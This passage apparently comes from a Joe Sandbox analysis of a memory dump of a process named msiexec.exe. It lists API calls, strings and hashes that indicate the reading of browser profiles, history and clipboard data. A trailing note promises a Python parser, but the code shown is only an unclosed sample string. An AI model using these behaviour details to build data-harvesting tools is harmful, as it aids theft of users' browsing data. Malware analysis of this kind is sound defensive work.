• EmptyClipboard.USER32 ref: 004098EC
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
• GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
• GlobalLock.KERNEL32(00000000), ref: 00409927
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
• GlobalUnlock.KERNEL32(00000000), ref: 0040994C
• SetClipboardData.USER32(0000000D,00000000), ref: 00409955
• GetLastError.KERNEL32 ref: 0040995D
• CloseHandle.KERNEL32(?), ref: 00409969
• GetLastError.KERNEL32 ref: 00409974
• CloseClipboard.USER32 ref: 0040997D
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
• String ID:
• API String ID: 3604893535-0
APIs
• EmptyClipboard.USER32 ref: 00409882
• wcslen.MSVCRT ref: 0040988F
• GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
• GlobalLock.KERNEL32(00000000), ref: 004098AC
• memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
• GlobalUnlock.KERNEL32(00000000), ref: 004098BE
• SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
• CloseClipboard.USER32 ref: 004098D7
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
• String ID:
• API String ID: 1213725291-0
APIs
• GetLastError.KERNEL32 ref: 004182D7
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
• FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
• LocalFree.KERNEL32(?), ref: 00418342
• free.MSVCRT ref: 00418370
  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7507DF80,?,0041755F,?), ref: 00417452
  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
• String ID: OsError 0x%x (%u)
• API String ID: 2360000266-2664311388
APIs
• _wcsicmp.MSVCRT ref: 004022A6
• _wcsicmp.MSVCRT ref: 004022D7
• _wcsicmp.MSVCRT ref: 00402305
• _wcsicmp.MSVCRT ref: 00402333
  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
• memset.MSVCRT ref: 0040265F
• memcpy.MSVCRT(?,?,00000011), ref: 0040269B
  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
• memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
• LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
• FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
• String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
• API String ID: 577499730-1134094380
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
• String ID: :stringdata$ftp://$http://$https://
• API String ID: 2787044678-1921111777
APIs
• GetDlgItem.USER32(?,000003E9), ref: 0041402F
• GetDlgItem.USER32(?,000003E8), ref: 0041403B
• GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
• GetWindowLongW.USER32(?,000000F0), ref: 00414056
• GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
• GetWindowLongW.USER32(?,000000EC), ref: 0041406B
• GetWindowRect.USER32(00000000,?), ref: 0041407D
• GetWindowRect.USER32(?,?), ref: 00414088
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
• GetDC.USER32 ref: 004140E3
• wcslen.MSVCRT ref: 00414123
• GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
• ReleaseDC.USER32(?,?), ref: 00414181
• _snwprintf.MSVCRT ref: 00414244
• SetWindowTextW.USER32(?,?), ref: 00414258
• SetWindowTextW.USER32(?,00000000), ref: 00414276
• GetDlgItem.USER32(?,00000001), ref: 004142AC
• GetWindowRect.USER32(00000000,?), ref: 004142BC
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
• GetClientRect.USER32(?,?), ref: 004142E1
• GetWindowRect.USER32(?,?), ref: 004142EB
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
• GetClientRect.USER32(?,?), ref: 0041433B
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
• String ID: %s:$EDIT$STATIC
• API String ID: 2080319088-3046471546
APIs
• EndDialog.USER32(?,?), ref: 00413221
• GetDlgItem.USER32(?,000003EA), ref: 00413239
• SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
• SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
• memset.MSVCRT ref: 00413292
• memset.MSVCRT ref: 004132B4
• memset.MSVCRT ref: 004132CD
• memset.MSVCRT ref: 004132E1
• memset.MSVCRT ref: 004132FB
• memset.MSVCRT ref: 00413310
• GetCurrentProcess.KERNEL32 ref: 00413318
• ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
• ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
• memset.MSVCRT ref: 004133C0
• GetCurrentProcessId.KERNEL32 ref: 004133CE
• memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
• wcscpy.MSVCRT ref: 0041341F
• _snwprintf.MSVCRT ref: 0041348E
• SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
• GetDlgItem.USER32(?,000003EA), ref: 004134B0
• SetFocus.USER32(00000000), ref: 004134B7
Strings
• {Unknown}, xrefs: 004132A6
• Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
• String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
• API String ID: 4111938811-1819279800
APIs
• GetDlgItem.USER32(?,000003EC), ref: 004011F0
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
• GetDlgItem.USER32(?,000003EE), ref: 00401238
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
• GetDlgItem.USER32(?,000003EC), ref: 00401273
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
• GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
• LoadCursorW.USER32(00000000,00000067), ref: 00401297
• SetCursor.USER32(00000000,?,?), ref: 0040129E
• GetDlgItem.USER32(?,000003EE), ref: 004012BF
• ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
• GetDlgItem.USER32(?,000003EC), ref: 004012E6
• SetBkMode.GDI32(?,00000001), ref: 004012F2
• SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                                                          • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 829165378-0
                                                                                                                                                                                                          • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                                          • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00404172
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                          • memset.MSVCRT ref: 00404200
                                                                                                                                                                                                          • memset.MSVCRT ref: 00404215
                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040426E
                                                                                                                                                                                                          • memset.MSVCRT ref: 004042CD
                                                                                                                                                                                                          • memset.MSVCRT ref: 004042E2
                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                                                          • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                                                          • API String ID: 2454223109-1580313836
                                                                                                                                                                                                          • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                                          • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                                                                          • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                                                          • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                                                                                          • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                                                          • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                                                          • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                                                          • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                                                            • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                                                            • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                                                          • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                                                          • API String ID: 4054529287-3175352466
                                                                                                                                                                                                          • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                                          • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                          • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                                          • API String ID: 667068680-2887671607
                                                                                                                                                                                                          • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                          • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                                                                          APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: _snwprintfmemset$wcscpy$wcscat
• String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
• API String ID: 1607361635-601624466
• Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
• Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
• Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
• Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: _snwprintf$memset$wcscpy
• String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
• API String ID: 2000436516-3842416460
• Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
• Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
• Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
• Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
APIs
  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
• GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
• LoadIconW.USER32(00000000,00000072), ref: 004035CA
• GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
• LoadIconW.USER32(00000000,00000074), ref: 004035E4
• GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
• LoadIconW.USER32(00000000,00000073), ref: 004035F8
• GetModuleHandleW.KERNEL32(00000000), ref: 00403607
• LoadIconW.USER32(00000000,00000075), ref: 0040360C
• GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
• LoadIconW.USER32(00000000,0000006F), ref: 00403620
• GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
• LoadIconW.USER32(00000000,00000076), ref: 00403634
• GetModuleHandleW.KERNEL32(00000000), ref: 00403643
• LoadIconW.USER32(00000000,00000077), ref: 00403648
• GetModuleHandleW.KERNEL32(00000000), ref: 00403657
• LoadIconW.USER32(00000000,00000070), ref: 0040365C
• GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
• LoadIconW.USER32(00000000,00000078), ref: 00403670
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
• String ID:
• API String ID: 1043902810-0
• Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
• Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
• Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
• Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
APIs
  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
• free.MSVCRT ref: 0040E49A
  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
• memset.MSVCRT ref: 0040E380
  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
• wcschr.MSVCRT ref: 0040E3B8
• memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75082EE0), ref: 0040E3EC
• memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75082EE0), ref: 0040E407
• memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75082EE0), ref: 0040E422
• memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75082EE0), ref: 0040E43D
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
• String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
• API String ID: 3849927982-2252543386
• Opcode ID: 4fb386ce9209b8875289dcc542ef71d6c34f1816ca3767685257c05f3f5c3b96
• Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
• Opcode Fuzzy Hash: 4fb386ce9209b8875289dcc542ef71d6c34f1816ca3767685257c05f3f5c3b96
• Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
APIs
• ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
• _snwprintf.MSVCRT ref: 0044488A
• wcscpy.MSVCRT ref: 004448B4
• ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: ??2@??3@_snwprintfwcscpy
• String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
• API String ID: 2899246560-1542517562
• Opcode ID: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
• Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
• Opcode Fuzzy Hash: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
• Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
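The function blocks above (API call list, memory dump source, Similarity metadata) are what an analyst pivots on when comparing this msiexec.exe memory dump with other reports: the Opcode ID and Instruction ID identify a function across samples, the String ID carries the strings the function references. The following is an added example, not part of the Joe Sandbox report, that parses this text layout into records and offers two pivots (an API histogram and a lookup of functions by embedded string). It assumes only what is visible on this page: each block opens with an "APIs" header, metadata lines are "•"-bulleted "Key: Value" pairs, and "$" separates the entries of a String ID. The sample input is constructed by copying two blocks from above; the semantics of the .sdmp file name fields are not interpreted.

```python
import re
from collections import Counter

# Constructed sample input: two function blocks copied from the report above, in the text
# layout Joe Sandbox uses for its function analysis (the "•" bullets are literal).
SAMPLE = r"""APIs
  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
• GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
• LoadIconW.USER32(00000000,00000072), ref: 004035CA
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
• String ID:
• API String ID: 1043902810-0
• Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
• Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
• Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
• Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
APIs
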